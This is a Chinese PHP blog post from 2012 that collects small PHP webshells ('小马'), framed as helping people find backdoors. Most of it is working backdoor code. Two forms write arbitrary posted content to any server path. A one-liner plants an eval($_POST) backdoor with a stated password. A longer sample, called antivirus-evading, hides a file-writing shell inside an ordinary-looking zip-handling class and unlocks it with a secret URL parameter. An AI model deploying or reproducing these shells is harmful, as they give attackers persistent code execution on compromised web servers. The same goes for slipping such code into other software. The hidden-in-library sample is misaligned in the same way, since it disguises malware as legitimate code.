首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

超小PHP小马小结(方便查找后门的朋友)

Posted in PHP onMay 05, 2012

作者: spider
我也来个超小PHP小马 

<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
} 
?>

昨晚无聊看了会 php 的教程,发现php真是相当的强大啊!顺便写了个php小马
下面直接贴代码了。。 
<html> 
<title >By: SinCoder</title> 
<font color=red size=6>php小马 By:SinCoder</br></font> 
<? echo "</br>本程序的路径: ".__FILE__. 
"</br>服务器操作系统: ".PHP_OS. 
"</br>服务器IP地址: ".gethostbyname($_SERVER["SERVER_NAME"]). 
"</br>PHP版本: ".PHP_VERSION; 
?> 
<form action = <? echo strrchr(__FILE__,"\\"); ?> method="post"> 
要提交的数据:</br> 
<textarea type="text" name="data" rows="10" cols="30"> 
</textarea> 
</br> 
保存路径:<input type="text" name="dir" /> 
</br> 
<input type="submit" value="提交"/> 
</form> 
</html> 
<? 
if(!(isset($_POST["data"]) && isset($_POST["dir"]))) 
exit(); 
if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) 
{ 
$p_File=fopen($_POST["dir"],"a"); 
if(!$p_File) 
echo "写入失败!请换个目录试试!"; 
else 
echo "Ok!! "; 
fputs($p_File,$_POST["data"]); 
fclose($p_File); 
} 
else 
echo "请把数据填写完整!"; 
?>

php一句话小马的后门 
<?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?>

这样访问之后,在当前目录生成jb51.php 内容为 <?eval($_POST[jb51]);?>)?> 的一句话小马,密码为 jb51
最新免杀php小马 
<?php 
class zip 
{ 
var $datasec, $ctrl_dir = array(); 
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; 
var $old_offset = 0; var $dirs = Array("."); 
function get_List($zip_name) 
{ 
$ret = ''; 
$zip = @fopen($zip_name, 'rb'); 
if(!$zip) return(0); 
$centd = $this->ReadCentralDir($zip,$zip_name); 
@rewind($zip); 
@fseek($zip, $centd['offset']); 
for ($i=0; $i<$centd['entries']; $i++) 
{ 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i;$info['filename'] = $header['filename']; 
$info['stored_filename'] = $header['stored_filename']; 
$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; 
$info['crc'] = strtoupper(dechex( $header['crc'] )); 
$info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; 
$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; 
$info['index'] = $header['index'];$info['status'] = $header['status']; 
$ret[]=$info; unset($header); 
} 
return $ret; 
} 
function Add($files,$compact) 
{ 
if(!is_array($files[0])) $files=Array($files); 
for($i=0;$files[$i];$i++){ 
$fn = $files[$i]; 
if(!in_Array(dirname($fn[0]),$this->dirs)) 
$this->add_Dir(dirname($fn[0])); 
if(basename($fn[0])) 
$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); 
} 
return $ret; 
} 
function get_file() 
{ 
$data = implode('', $this -> datasec); 
$ctrldir = implode('', $this -> ctrl_dir); 
return $data . $ctrldir . $this -> eof_ctrl_dir . 
pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). 
pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; 
} 
function add_dir($name) 
{ 
$name = str_replace("\\", "/", $name); 
$fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode("", $this->datasec)); 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); 
$ext = "\xff\xff\xff\xff"; 
$cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; 
$this -> ctrl_dir[] = $cdrec; 
$this -> old_offset = $new_offset; 
$this -> dirs[] = $name; 
} 
function add_File($data, $name, $compact = 1) 
{ 
$name = str_replace('\\', '/', $name); 
$dtime = dechex($this->DosTime()); 
$hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] 
. '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; 
eval('$hexdtime = "' . $hexdtime . '";'); 
if($compact) 
$fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; 
else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; 
$unc_len = strlen($data); $crc = crc32($data); 
if($compact){ 
$zdata = gzcompress($data); $c_len = strlen($zdata); 
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); 
}else{ 
$zdata = $data; 
} 
$c_len=strlen($zdata); 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode('', $this->datasec)); 
if($compact) 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; 
else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00"; 
$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); 
$cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); 
$cdrec .= pack('V', $this -> old_offset ); 
$this -> old_offset = $new_offset; 
$cdrec .= $name; 
$this -> ctrl_dir[] = $cdrec; 
return true; 
} 
function DosTime() { 
$timearray = getdate(); 
if ($timearray['year'] < 1980) { 
$timearray['year'] = 1980; $timearray['mon'] = 1; 
$timearray['mday'] = 1; $timearray['hours'] = 0; 
$timearray['minutes'] = 0; $timearray['seconds'] = 0; 
} 
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | 
($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); 
} 
//解压整个压缩包 
//直接用 Extract 会有路径问题,本函数先从列表中获得文件信息并创建好所有目录然后才运行 Extract 
function ExtractAll ( $zn, $to) 
{ 
if(substr($to,-1)!="/") $to .= "/"; 
$files = $this->get_List($zn); 
$cn = count($files); 
if(is_array($files)) 
{ 
for($i=0;$i<$cn;$i++) 
{ 
if($files[$i]['folder']==1){ 
@mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
@chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
} 
} 
} 
$this->Extract ($zn,$to); 
} 
function Extract ( $zn, $to, $index = Array(-1) ) 
{ 
$ok = 0; $zip = @fopen($zn,'rb'); 
if(!$zip) return(-1); 
$cdir = $this->ReadCentralDir($zip,$zn); 
$pos_entry = $cdir['offset']; 
if(!is_array($index)){ $index = array($index); } 
for($i=0; isset($index[$i]);$i++){ 
if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) 
return(-1); 
} 
for ($i=0; $i<$cdir['entries']; $i++) 
{ 
@fseek($zip, $pos_entry); 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i; $pos_entry = ftell($zip); 
@rewind($zip); fseek($zip, $header['offset']); 
if(in_array("-1",$index)||in_array($i,$index)) 
$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); 
} 
fclose($zip); 
return $stat; 
} 
function ReadFileHeader($zip) 
{ 
$binary_data = fread($zip, 30); 
$data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); 
$header['filename'] = fread($zip, $data['filename_len']); 
if ($data['extra_len'] != 0) { 
$header['extra'] = fread($zip, $data['extra_len']); 
} else { $header['extra'] = ''; } 
$header['compression'] = $data['compression'];$header['size'] = $data['size']; 
$header['compressed_size'] = $data['compressed_size']; 
$header['crc'] = $data['crc']; $header['flag'] = $data['flag']; 
$header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; 
if ($header['mdate'] && $header['mtime']){ 
$hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; 
$seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; 
$month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
}else{$header['mtime'] = time();} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = "ok"; 
return $header; 
} 
function ReadCentralFileHeaders($zip){ 
$binary_data = fread($zip, 46); 
$header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); 
if ($header['filename_len'] != 0) 
$header['filename'] = fread($zip,$header['filename_len']); 
else $header['filename'] = ''; 
if ($header['extra_len'] != 0) 
$header['extra'] = fread($zip, $header['extra_len']); 
else $header['extra'] = ''; 
if ($header['comment_len'] != 0) 
$header['comment'] = fread($zip, $header['comment_len']); 
else $header['comment'] = ''; 
if ($header['mdate'] && $header['mtime']) 
{ 
$hour = ($header['mtime'] & 0xF800) >> 11; 
$minute = ($header['mtime'] & 0x07E0) >> 5; 
$seconde = ($header['mtime'] & 0x001F)*2; 
$year = (($header['mdate'] & 0xFE00) >> 9) + 1980; 
$month = ($header['mdate'] & 0x01E0) >> 5; 
$day = $header['mdate'] & 0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
} else { 
$header['mtime'] = time(); 
} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = 'ok'; 
if (substr($header['filename'], -1) == '/') 
$header['external'] = 0x41FF0010; 
return $header; 
} 
function ReadCentralDir($zip,$zip_name) 
{ 
$size = filesize($zip_name); 
if ($size < 277) $maximum_size = $size; 
else $maximum_size=277; 
@fseek($zip, $size-$maximum_size); 
$pos = ftell($zip); $bytes = 0x00000000; 
while ($pos < $size) 
{ 
$byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); 
if ($bytes == 0x504b0506){ $pos++; break; } $pos++; 
} 
$data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); 
if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); 
else $centd['comment'] = ''; $centd['entries'] = $data['entries']; 
$centd['disk_entries'] = $data['disk_entries']; 
$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; 
$centd['size'] = $data['size']; $centd['disk'] = $data['disk']; 
return $centd; 
} 
function ExtractFile($header,$to,$zip) 
{ 
$header = $this->readfileheader($zip); 
$header['external'] = (!isset($header['external']) ? 0 : $header['external']); 
if(substr($to,-1)!="/") $to.="/"; 
if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); 
if (!($header['external']==0x41FF0010)&&!($header['external']==16)) 
{ 
if ($header['compression']==0) 
{ 
$fp = @fopen($to.$header['filename'], 'wb'); 
if(!$fp) return(-1); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); 
touch($to.$header['filename'], $header['mtime']); 
}else{ 
$fp = @fopen($to.$header['filename'].'.gz','wb'); 
if(!$fp) return(-1); 
$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), 
Chr(0x00), time(), Chr(0x00), Chr(3)); 
fwrite($fp, $binary_data, 10); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 1024 ? $size : 1024); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
$binary_data = pack('VV', $header['crc'], $header['size']); 
fwrite($fp, $binary_data,8); fclose($fp); 
$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); 
if(!$gzp) return(-2); 
$fp = @fopen($to.$header['filename'],'wb'); 
if(!$fp) return(-1); 
$size = $header['size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = gzread($gzp, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); gzclose($gzp); 
touch($to.$header['filename'], $header['mtime']); 
@unlink($to.$header['filename'].'.gz'); 
}} 
return true; 
} 
} 
if($_GET['zxzgcn']=='login'){ 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
save to: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="save"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!'; 
@fclose($fp); 
} 
} 
?>

用法xxx.php?zxzgcn=login

超小PHP小马小结(方便查找后门的朋友)

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
超级简单的发送邮件程序
Oct 09 PHP
php实现首页链接查询 友情链接检查的代码
Jan 05 PHP
理解php原理的opcodes(操作码)
Oct 26 PHP
php的日期处理函数及uchome的function_coomon中日期处理函数的研究
Jan 12 PHP
TMDPHP 模板引擎使用教程
Mar 13 PHP
PHP 正则表达式之正则处理函数小结(preg_match,preg_match_all,preg_replace,preg_split)
Oct 05 PHP
Mysql的Root密码忘记,查看或修改的解决方法(图文介绍)
Jun 14 PHP
PHP session_start()问题解疑(详细介绍)
Jul 05 PHP
php内存缓存实现方法
Jan 24 PHP
Mac环境下php操作mysql数据库的方法分享
May 11 PHP
PHP对象克隆clone用法示例
Sep 28 PHP
php精度计算的问题解析
Jun 21 PHP
apache mysql php 源码编译使用方法
May 03 #PHP
几个有用的php字符串过滤,转换函数代码
May 01 #PHP
PHP 基于文件头的文件类型验证类函数
May 01 #PHP
PHP 第三节 变量介绍
Apr 28 #PHP
PHP 第二节 数据类型之转换
Apr 28 #PHP
PHP 第二节 数据类型之数组
Apr 28 #PHP
PHP 第二节 数据类型之字符串类型
Apr 28 #PHP
绘图(1) 定时任务(2) MYSQL函数(1) 逻辑架构(1) turtle(1) Mysql报错(1) 计时器(1) mysql.user(1) offset(1) limit(1)
You might like
建站常用13种PHP开源CMS比较
2009/08/23 PHP
Windows下PHP开发环境搭建教程(Apache+PHP+MySQL)
2016/06/13 PHP
Laravel框架模板加载,分配变量及简单路由功能示例
2018/06/11 PHP
js当一个变量为函数时 应该注意的一点细节小结
2011/12/29 Javascript
用js设置下拉框为只读的小技巧
2014/04/10 Javascript
jquery操作HTML5 的data-*的用法实例分享
2014/08/17 Javascript
理解jQuery stop()方法
2014/11/21 Javascript
JavaScript检测实例属性, 原型属性
2015/02/04 Javascript
javascript中的正则表达式使用指南
2015/03/01 Javascript
JavaScript实现自动变换表格边框颜色
2015/05/08 Javascript
javascript如何实现360度全景照片问题汇总
2016/04/04 Javascript
js文件中直接alert()中文出来的是乱码的解决方法
2016/11/01 Javascript
EasyUI学习之Combobox下拉列表(1)
2016/12/29 Javascript
基于JavaScript实现焦点图轮播效果
2017/03/27 Javascript
用原生JS实现简单的多选框功能
2017/06/12 Javascript
vue.extend与vue.component的区别和联系
2018/09/19 Javascript
使用 Node.js 实现图片的动态裁切及算法实例代码详解
2018/09/29 Javascript
推荐一个基于Node.js的表单验证库
2019/02/15 Javascript
微信小程序开发实现的IP地址查询功能示例
2019/03/28 Javascript
Vue 使用beforeEach实现登录状态检查功能
2019/10/31 Javascript
Javascript异步执行不按顺序解决方案
2020/04/30 Javascript
Python实现连接两个无规则列表后删除重复元素并升序排序的方法
2018/02/05 Python
Python实现批量执行同目录下的py文件方法
2019/01/11 Python
Python实现计算字符串中出现次数最多的字符示例
2019/01/21 Python
django模板结构优化的方法
2019/02/28 Python
Python如何爬取实时变化的WebSocket数据的方法
2019/03/09 Python
详解Python装饰器
2019/03/25 Python
python 判断linux进程,并杀死进程的实现方法
2019/07/01 Python
pandas read_excel()和to_excel()函数解析
2019/09/19 Python
python3爬虫中多线程的优势总结
2020/11/24 Python
python如何构建mock接口服务
2021/01/28 Python
html5读取本地文件示例代码
2014/04/22 HTML / CSS
amazeui页面校验功能的实现代码
2020/08/24 HTML / CSS
消防器材管理制度
2014/01/28 职场文书
群众路线党员自我评议范文2014
2014/09/24 职场文书
2015年财务试用期工作总结
2014/12/24 职场文书